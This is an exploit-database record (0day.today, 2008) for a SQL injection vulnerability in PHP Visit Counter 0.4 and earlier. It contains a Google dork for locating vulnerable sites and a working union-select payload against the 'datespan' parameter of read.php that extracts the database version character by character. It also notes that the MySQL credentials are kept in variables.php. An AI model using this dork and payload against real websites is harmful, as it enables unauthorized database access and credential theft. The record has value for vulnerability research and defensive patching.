{"published": "2008-05-31T00:00:00", "id": "1337DAY-ID-3091", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2018-02-09T09:21:29", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-09T09:21:29", "rev": 2}, "vulnersScore": 0.6}, "type": "zdt", "lastseen": "2018-02-09T09:21:29", "edition": 2, "title": "PHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/3091", "modified": "2008-05-31T00:00:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": [], "sourceHref": "https://0day.today/exploit/3091", "references": [], "reporter": "Lidloses_Auge", "sourceData": "===============================================================\r\nPHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\n###############################################################\r\n#\r\n# PHP Visit Counter <= 0.4 - SQL Injection Vulnerability\r\n# \r\n# Vulnerability discovered by: Lidloses_Auge \r\n# Greetz to: -=Player=- , Suicide, g4ms3, enco,\r\n# GPM, Free-Hack, Ciphercrew\r\n# Date: 30.05.2008\r\n#\r\n###############################################################\r\n# \r\n# Dork: inurl:\"read.php?datespan=\"\r\n#\r\n# Vulnerability:\r\n#\r\n# 1.) SQL Injection\r\n#\r\n# 1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*\r\n#\r\n# Notes:\r\n#\r\n# Output is displayed as INT, so you've to convert it into ascii and\r\n# scan every single letter to get the whole name.\r\n# MySQL Data is stored in [Counterpath]/variables.php\r\n#\r\n###############################################################\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-09] #"}

{}